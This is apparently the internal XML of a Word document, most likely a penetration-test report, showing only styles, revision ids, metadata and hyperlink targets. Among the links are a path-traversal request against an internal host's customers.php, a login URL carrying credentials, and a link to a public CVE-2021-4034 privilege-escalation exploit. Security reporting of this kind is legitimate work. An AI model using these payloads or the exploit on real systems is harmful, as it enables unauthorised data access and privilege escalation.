    <w:rsid w:val="00600A48"/>
    <w:rsid w:val="00640AE7"/>
    <w:rsid w:val="00657B5E"/>
    <w:rsid w:val="0068224A"/>
    <w:rsid w:val="006A08E8"/>
    <w:rsid w:val="006C65CF"/>
    <w:rsid w:val="006D4D8E"/>
    <w:rsid w:val="006D6867"/>
    <w:rsid w:val="006E50B4"/>
    <w:rsid w:val="00714CFE"/>
    <w:rsid w:val="00721CE5"/>
    <w:rsid w:val="007401EF"/>
    <w:rsid w:val="007B16FC"/>
    <w:rsid w:val="00812F92"/>
    <w:rsid w:val="00863008"/>
    <w:rsid w:val="00866314"/>
    <w:rsid w:val="008747CA"/>
    <w:rsid w:val="00883C02"/>
    <w:rsid w:val="00890DE9"/>
    <w:rsid w:val="008A4D8B"/>
    <w:rsid w:val="008F62ED"/>
    <w:rsid w:val="00914447"/>
    <w:rsid w:val="00926AA3"/>
    <w:rsid w:val="00960C35"/>
    <w:rsid w:val="00976619"/>
    <w:rsid w:val="00A74F8C"/>
    <w:rsid w:val="00B0442E"/>
    <w:rsid w:val="00B051D3"/>
    <w:rsid w:val="00B41A85"/>
    <w:rsid w:val="00B94233"/>
    <w:rsid w:val="00BA3E0C"/>
    <w:rsid w:val="00BD3D73"/>
    <w:rsid w:val="00BE4A98"/>
    <w:rsid w:val="00C34F93"/>
    <w:rsid w:val="00C65FED"/>
    <w:rsid w:val="00C6750E"/>
    <w:rsid w:val="00C76750"/>
    <w:rsid w:val="00C97EFD"/>
    <w:rsid w:val="00CF0EFB"/>
    <w:rsid w:val="00CF76BE"/>
    <w:rsid w:val="00D0018F"/>
    <w:rsid w:val="00D57E0F"/>
    <w:rsid w:val="00D90E26"/>
    <w:rsid w:val="00D93DFA"/>
    <w:rsid w:val="00D962D3"/>
    <w:rsid w:val="00DB4D1D"/>
    <w:rsid w:val="00DD31D4"/>
    <w:rsid w:val="00E247F9"/>
    <w:rsid w:val="00E56270"/>
    <w:rsid w:val="00E5BEF9"/>
    <w:rsid w:val="00EC7A7A"/>
    <w:rsid w:val="00ED489E"/>
    <w:rsid w:val="00F12F69"/>
    <w:rsid w:val="00F52E62"/>
    <w:rsid w:val="00F961EA"/>
    <w:rsid w:val="00FC6ABF"/>
    <w:rsid w:val="00FD6594"/>
    <w:rsid w:val="01A16E36"/>
    <w:rsid w:val="02772047"/>
    <w:rsid w:val="02986841"/>
    <w:rsid w:val="02BD03AC"/>
    <w:rsid w:val="0528B6EB"/>
    <w:rsid w:val="05A883B7"/>
    <w:rsid w:val="065B848B"/>
    <w:rsid w:val="06678301"/>
    <w:rsid w:val="068E4A9F"/>
    <w:rsid w:val="07253820"/>
    <w:rsid w:val="07DCD2DF"/>
    <w:rsid w:val="07FFFEDD"/>
    <w:rsid w:val="08609D07"/>
    <w:rsid w:val="08C0ED97"/>
    <w:rsid w:val="097002BE"/>
    <w:rsid w:val="09739898"/>
    <w:rsid w:val="098D58D9"/>
    <w:rsid w:val="09B50094"/>
    <w:rsid w:val="0A04B4F4"/>
    <w:rsid w:val="0A7D8464"/>
    <w:rsid w:val="0AA0D98B"/>
    <w:rsid w:val="0ABEF8D1"/>
    <w:rsid w:val="0B6FB329"/>
    <w:rsid w:val="0BC63E9A"/>
    <w:rsid w:val="0C3F93B1"/>
    <w:rsid w:val="0CC1B1AA"/>
    <w:rsid w:val="0D5235E5"/>
    <w:rsid w:val="0E0D2214"/>
    <w:rsid w:val="0E2DEC76"/>
    <w:rsid w:val="0E4459AE"/>
    <w:rsid w:val="0E95B696"/>
    <w:rsid w:val="0E9E0636"/>
    <w:rsid w:val="0F163D70"/>
    <w:rsid w:val="0FE7E4C4"/>
    <w:rsid w:val="1018E8ED"/>
    <w:rsid w:val="10826998"/>
    <w:rsid w:val="10DCF1B5"/>
    <w:rsid w:val="10E527D9"/>
    <w:rsid w:val="113FD080"/>
    <w:rsid w:val="117BFA70"/>
    <w:rsid w:val="12D1CC95"/>
    <w:rsid w:val="1419AE14"/>
    <w:rsid w:val="14F41F5D"/>
    <w:rsid w:val="1528D794"/>
    <w:rsid w:val="153E6889"/>
    <w:rsid w:val="162A3DF6"/>
    <w:rsid w:val="1744F3F3"/>
    <w:rsid w:val="179FE71D"/>
    <w:rsid w:val="17FCB434"/>
    <w:rsid w:val="1892E1E9"/>
    <w:rsid w:val="19016E1A"/>
    <w:rsid w:val="19BB1C27"/>
    <w:rsid w:val="19F2B4FA"/>
    <w:rsid w:val="1A0DA922"/>
    <w:rsid w:val="1A1D0390"/>
    <w:rsid w:val="1AF63D80"/>
    <w:rsid w:val="1B7A6FA2"/>
    <w:rsid w:val="1BF728F0"/>
    <w:rsid w:val="1CBD086D"/>
    <w:rsid w:val="1D8F7EFF"/>
    <w:rsid w:val="1E30A53F"/>
    <w:rsid w:val="1E4CC7FB"/>
    <w:rsid w:val="1F7C1D66"/>
    <w:rsid w:val="1FF4A92F"/>
    <w:rsid w:val="2094DB25"/>
    <w:rsid w:val="20E29380"/>
    <w:rsid w:val="20F27CDF"/>
    <w:rsid w:val="20F357A2"/>
    <w:rsid w:val="2116F8A2"/>
    <w:rsid w:val="21B257C6"/>
    <w:rsid w:val="21F46AA0"/>
    <w:rsid w:val="2285E12D"/>
    <w:rsid w:val="232296FE"/>
    <w:rsid w:val="23E26B39"/>
    <w:rsid w:val="2424F97F"/>
    <w:rsid w:val="2439FD94"/>
    <w:rsid w:val="24FBA399"/>
    <w:rsid w:val="259AC762"/>
    <w:rsid w:val="25F2C2E0"/>
    <w:rsid w:val="25FE061A"/>
    <w:rsid w:val="264C0CFC"/>
    <w:rsid w:val="265DE983"/>
    <w:rsid w:val="27030AB4"/>
    <w:rsid w:val="284527BD"/>
    <w:rsid w:val="299DA059"/>
    <w:rsid w:val="2AB12C9E"/>
    <w:rsid w:val="2B2F805E"/>
    <w:rsid w:val="2B3BC04E"/>
    <w:rsid w:val="2C5F1DCA"/>
    <w:rsid w:val="2C88AC00"/>
    <w:rsid w:val="2CCCBD06"/>
    <w:rsid w:val="2D2D1110"/>
    <w:rsid w:val="2E155010"/>
    <w:rsid w:val="2E39C097"/>
    <w:rsid w:val="2E62A322"/>
    <w:rsid w:val="2E808730"/>
    <w:rsid w:val="303E357D"/>
    <w:rsid w:val="318FBCB2"/>
    <w:rsid w:val="32347BB4"/>
    <w:rsid w:val="32D4BE64"/>
    <w:rsid w:val="33C188A9"/>
    <w:rsid w:val="33F422C8"/>
    <w:rsid w:val="35BA7D5C"/>
    <w:rsid w:val="360DED96"/>
    <w:rsid w:val="36F545A7"/>
    <w:rsid w:val="3721887C"/>
    <w:rsid w:val="3754A913"/>
    <w:rsid w:val="375C49CC"/>
    <w:rsid w:val="37802411"/>
    <w:rsid w:val="39ED9BC6"/>
    <w:rsid w:val="3AD441A0"/>
    <w:rsid w:val="3B8C0CCF"/>
    <w:rsid w:val="3BC8B6CA"/>
    <w:rsid w:val="3BFADC4C"/>
    <w:rsid w:val="3C3E3710"/>
    <w:rsid w:val="3C541B99"/>
    <w:rsid w:val="3CC99AE3"/>
    <w:rsid w:val="3D5D5956"/>
    <w:rsid w:val="3E353339"/>
    <w:rsid w:val="3EBF6BD2"/>
    <w:rsid w:val="3F3C6D96"/>
    <w:rsid w:val="3F61CFDC"/>
    <w:rsid w:val="405CC0A4"/>
    <w:rsid w:val="40651F7F"/>
    <w:rsid w:val="41F0F2F6"/>
    <w:rsid w:val="41F515E3"/>
    <w:rsid w:val="42881921"/>
    <w:rsid w:val="42BB3521"/>
    <w:rsid w:val="42E5097D"/>
    <w:rsid w:val="43C08A07"/>
    <w:rsid w:val="44042030"/>
    <w:rsid w:val="443540FF"/>
    <w:rsid w:val="44AAC130"/>
    <w:rsid w:val="45F21B5D"/>
    <w:rsid w:val="46259D81"/>
    <w:rsid w:val="46635C03"/>
    <w:rsid w:val="46AAF16D"/>
    <w:rsid w:val="46CFA303"/>
    <w:rsid w:val="46EB133F"/>
    <w:rsid w:val="47BC2E43"/>
    <w:rsid w:val="47C1ABAE"/>
    <w:rsid w:val="47ECC58D"/>
    <w:rsid w:val="488B27B0"/>
    <w:rsid w:val="48BEB1F2"/>
    <w:rsid w:val="4987A8B4"/>
    <w:rsid w:val="4A5A8253"/>
    <w:rsid w:val="4B1B6C89"/>
    <w:rsid w:val="4B5213E3"/>
    <w:rsid w:val="4BE93B2A"/>
    <w:rsid w:val="4BFB2024"/>
    <w:rsid w:val="4C024C61"/>
    <w:rsid w:val="4C153C8D"/>
    <w:rsid w:val="4CB9752A"/>
    <w:rsid w:val="4CCBA149"/>
    <w:rsid w:val="4D01BA85"/>
    <w:rsid w:val="4D2A257B"/>
    <w:rsid w:val="4D4AE527"/>
    <w:rsid w:val="4EFCCB98"/>
    <w:rsid w:val="4F4341F4"/>
    <w:rsid w:val="4FC1BF60"/>
    <w:rsid w:val="5003BD1C"/>
    <w:rsid w:val="5061C63D"/>
    <w:rsid w:val="508B7FEB"/>
    <w:rsid w:val="51237AD6"/>
    <w:rsid w:val="51242686"/>
    <w:rsid w:val="51981031"/>
    <w:rsid w:val="51D0AE4C"/>
    <w:rsid w:val="520BC072"/>
    <w:rsid w:val="52380C83"/>
    <w:rsid w:val="52415E9D"/>
    <w:rsid w:val="527FC238"/>
    <w:rsid w:val="52D74B40"/>
    <w:rsid w:val="5331645B"/>
    <w:rsid w:val="535C94B3"/>
    <w:rsid w:val="539E36F4"/>
    <w:rsid w:val="53AE1C98"/>
    <w:rsid w:val="5459F344"/>
    <w:rsid w:val="555FD702"/>
    <w:rsid w:val="5596F7B1"/>
    <w:rsid w:val="563D332E"/>
    <w:rsid w:val="56BCF927"/>
    <w:rsid w:val="57422D10"/>
    <w:rsid w:val="574EE4CC"/>
    <w:rsid w:val="57919406"/>
    <w:rsid w:val="57A5212A"/>
    <w:rsid w:val="5812C2AE"/>
    <w:rsid w:val="586CD822"/>
    <w:rsid w:val="587D6973"/>
    <w:rsid w:val="594768E9"/>
    <w:rsid w:val="5970FAF3"/>
    <w:rsid w:val="5A00EDCE"/>
    <w:rsid w:val="5C1C4499"/>
    <w:rsid w:val="5E6F28E2"/>
    <w:rsid w:val="5EECAAF7"/>
    <w:rsid w:val="5F0928B7"/>
    <w:rsid w:val="601EB1D6"/>
    <w:rsid w:val="6040DF83"/>
    <w:rsid w:val="60702F52"/>
    <w:rsid w:val="609A05A6"/>
    <w:rsid w:val="60EAAAD5"/>
    <w:rsid w:val="61C08797"/>
    <w:rsid w:val="62139DC2"/>
    <w:rsid w:val="623167F0"/>
    <w:rsid w:val="623FC663"/>
    <w:rsid w:val="62972B23"/>
    <w:rsid w:val="638441A1"/>
    <w:rsid w:val="638BFB08"/>
    <w:rsid w:val="6454D1E7"/>
    <w:rsid w:val="6457CB08"/>
    <w:rsid w:val="64A81DB1"/>
    <w:rsid w:val="64BA2D69"/>
    <w:rsid w:val="64E84F43"/>
    <w:rsid w:val="65CB8407"/>
    <w:rsid w:val="6666EA25"/>
    <w:rsid w:val="67A03A84"/>
    <w:rsid w:val="67AB1C67"/>
    <w:rsid w:val="67B68BFF"/>
    <w:rsid w:val="67E5DE70"/>
    <w:rsid w:val="67EB7FCF"/>
    <w:rsid w:val="67F7392F"/>
    <w:rsid w:val="681CC5D1"/>
    <w:rsid w:val="696735BF"/>
    <w:rsid w:val="697B8ED4"/>
    <w:rsid w:val="697D7307"/>
    <w:rsid w:val="69F93DBC"/>
    <w:rsid w:val="6B899188"/>
    <w:rsid w:val="6C372E23"/>
    <w:rsid w:val="6CDEA5C8"/>
    <w:rsid w:val="6D1142FC"/>
    <w:rsid w:val="6DEF27B8"/>
    <w:rsid w:val="6E17DF48"/>
    <w:rsid w:val="6FDEAA55"/>
    <w:rsid w:val="6FEB0B54"/>
    <w:rsid w:val="710FF573"/>
    <w:rsid w:val="717A7AB6"/>
    <w:rsid w:val="7220DEEA"/>
    <w:rsid w:val="722934AC"/>
    <w:rsid w:val="7232B338"/>
    <w:rsid w:val="739D0014"/>
    <w:rsid w:val="76CEB6C6"/>
    <w:rsid w:val="771DADE0"/>
    <w:rsid w:val="77FA058A"/>
    <w:rsid w:val="780FDF7B"/>
    <w:rsid w:val="78176FB2"/>
    <w:rsid w:val="781D019D"/>
    <w:rsid w:val="79B01B2A"/>
    <w:rsid w:val="7A27EC89"/>
    <w:rsid w:val="7A5C7EB6"/>
    <w:rsid w:val="7AFE4FD6"/>
    <w:rsid w:val="7B062B4E"/>
    <w:rsid w:val="7B34AA9E"/>
    <w:rsid w:val="7D7D71A1"/>
    <w:rsid w:val="7E35F098"/>
    <w:rsid w:val="7E3A4937"/>
    <w:rsid w:val="7E3F70BA"/>
    <w:rsid w:val="7ECE0C5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8D262"/>
  <w15:docId w15:val="{18847D5A-5C28-4F00-9265-229988F9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b/>
      <w:color w:val="434343"/>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D7723"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="001D7723"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00101328"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00101328"/>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color w:val="666666"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="2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7723"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D7723"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>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NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="0025451F"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>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25451F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C6750E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D962D3"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D962D3"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00DD3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4794"/>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1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11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176360">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="298071576">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="477309554">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="642388549">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="848906937">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1127430189">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1781679391">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1821732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stephenson@172.16.1.2" TargetMode="External"/><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10.10.0.66/internal/customers.php?list=..%2Fdata%2Fcustomer.list" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/joeammond/CVE-2021-4034/blob/main/CVE-2021-4034.py" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.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mailto:info@netarmor.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nvd.nist.gov/vuln/detail/CVE-2021-4034" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.0.66:8001/login.php?username=w&amp;password=w&amp;Login=Enter" TargetMode="External"/><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D0EC-D346-49A6-9881-9BF725E1C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32</Pages>
  <Words>4780</Words>
  <Characters>27249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Zhou</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>Mitchell Zhou</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-19T04:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-19T04:57:00Z</dcterms:modified>
  <dc:language>en-US</dc:language>
</cp:coreProperties>
</file>